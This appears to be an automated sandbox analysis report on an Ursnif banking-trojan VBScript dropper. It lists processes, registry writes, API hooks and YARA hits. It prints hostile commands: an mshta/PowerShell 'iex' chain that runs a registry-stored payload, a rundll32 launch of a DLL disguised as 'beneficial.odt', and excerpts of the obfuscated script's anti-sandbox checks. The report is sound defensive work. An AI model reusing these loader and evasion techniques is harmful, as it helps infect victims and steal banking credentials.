Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000025.00000002.732660461.000001D681EC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

Source: C:\Windows\SysWOW64\rundll32.exe

28_2_04444CEA

System Summary:

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702E192C NtMapViewOfSection,	28_2_702E192C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702E1E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	28_2_702E1E74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702E12CE NtCreateSection,memset,	28_2_702E12CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702E2495 NtQueryVirtualMemory,	28_2_702E2495
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_044425E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	28_2_044425E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_04448055 NtQueryVirtualMemory,	28_2_04448055

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702E2274	28_2_702E2274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_04447E30	28_2_04447E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_04446680	28_2_04446680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_0444175B	28_2_0444175B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_70322400	28_2_70322400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_7030A1AC	28_2_7030A1AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_703263D0	28_2_703263D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_703055C0	28_2_703055C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_703047E0	28_2_703047E0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 702FA3B0 appears 34 times

Source: v8MaHZpVOY2L.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winVBS@14/8@6/1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_04446244 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,

28_2_04446244

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210802

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer

Source: v8MaHZpVOY2L.vbs	Virustotal: Detection: 34%
Source: v8MaHZpVOY2L.vbs	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
Source: unknown	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: v8MaHZpVOY2L.vbs

Static file information: File size 2145907 > 1048576

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdbXP@L source: powershell.exe, 00000025.00000002.750257715.000001D6861CE000.00000004.00000001.sdmp
Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000027.00000002.731260483.0000015F83160000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdb8 source: powershell.exe, 00000025.00000002.750151124.000001D68618E000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdb source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp
Source:	Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: wscript.exe, 00000002.00000003.406245520.00000294B943D000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.736255174.0000000070329000.00000002.00020000.sdmp, beneficial.odt.2.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdbXP@L source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell")Rastus = redden.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "30226" + ".txt"If WScript.CreateObject("Scripting.FileSystemObject").FileExists(Rastus) ThenJason = (258 - ((954 - 688.0) - (51 + (-43.0))))ElseREM export Schwartz pellet Josephus prophesy probabilist Medford transcript Indoeuropean, 6902325 midwives bazaar origin faceplate oersted dividend monologue furthermore Westminster, 2587295 gyrocompass capstone Jason = (((39 + 29.0) + (46 + 282.0)) - 395.0)End Ifforborne = JasonREM guarantee Paraguayan strand, fogy reap Zeiss broad penal provision sociometry Fresno remembrance condolence Philistine41 wall status dock End FunctionFunction minus()GxzLW("DEBUG: FS_FCC - Start")' octave rhododendron intuition. sac pediment. tail telescopic syringe aggravate wallet Lyon too on error resume next' Atlantis boulder phrasemake feed wardrobe. schlieren trainman maldistribute hindsight pentecostal Bodleian bedroom Nippon stoppage deflect, Set wdhWF = GetObject("winmgmts:\\.\root\cimv2")Set MDQ = wdhWF.ExecQuery("Select * from Win32_Processor", , (607 - (567 - ((88 + (-13.0)) + (-67.0)))))For Each giantess In MDQIf giantess.NumberOfCores < (((68 + 1.0) - 14.0) + (-(4146 - 4094.0))) Thenfossiliferous = TrueREM trouser Indiana whee, cotman knockout screenful Marriott Miles Rothschild lingual southpaw sportswriting torque. Lebesgue imperate decree Israelite duress megabyte GxzLW("DEBUG: FS_FCC - False")End IfREM rangy share humpty z conundrum. binocular Howell Worcestershire inferno ionosphere inferno370 phi mobcap corrigible downwind expression NextIf fossiliferous ThenOSWmEnd IfREM gestation average poverty saturater met longue. Pericles eohippus Aug impose, desist demurring stream594 withheld expound Eastman GxzLW("DEBUG: FS_FCC - True")REM Doherty Goodman wart smug oppressive, paraboloid stifle assiduous gummy. material quest revelry End FunctionFunction guerrilla()GxzLW("DEBUG: FS_CM - Start")on error resume next' bug famish batik antennae afforest112 cherubim browbeaten pidgin Fujitsu midband. barbarism jot Harbin sod Dim qjbJl,sturgeonqjbJl=6000sturgeon=3000RandomizeWScript.Sleep Int((qjbJl-sturgeon+1)*Rnd+sturgeon)Set wdhWF = GetObject("winmgmts:\\.\root\cimv2")Set MDQ = wdhWF.ExecQuery("Select * from Win32_ComputerSystem")' none slice cowpox summertime camelback testicular ogle lumen, marketplace grail caramel believe For Each giantess In MDQFOC = FOC + Int((giantess.TotalPhysicalMemory) / (1048865 - ((3614 - 2.0) - (3356 - 33.0))))NextIf FOC < (98 + ((1314 - (73 + 252.0)) - 57.0)) ThenGxzLW("DEBUG: FS_CM - False")REM Sousa Peloponnese curmudgeon joke Benson Auckland desideratum draw Cornwall ghastly gavotte, invidious, direct OSWmEnd IfGxzLW("DEBUG: FS_CM - True")End FunctionFunction gGXl()REM hat runt ultimatum physician maul. slang parliament Albert pyridine. 5714460 postoperative libertine scholastic nothing421 plethora Mycenaean flunk peaceable oriental GxzLW("DEBUG: FS_TD1 - Start")GxzLW("DEBUG: FS_TD2 - Start"

Suspicious powershell command line found

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_702E1D62 LoadLibraryA,GetProcAddress,

28_2_702E1D62

Source: beneficial.odt.2.dr

Static PE information: real checksum: 0xadda3 should be: 0xa6e2d

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702E2210 push ecx; ret	28_2_702E2219
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702E2263 push ecx; ret	28_2_702E2273
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_04447E1F push ecx; ret	28_2_04447E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_04447AB0 push ecx; ret	28_2_04447AB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_0444B1DE push esp; iretd	28_2_0444B26C

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\beneficial.odt

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\beneficial.odt

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\v8mahzpvoy2l.vbs

Jump to behavior

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
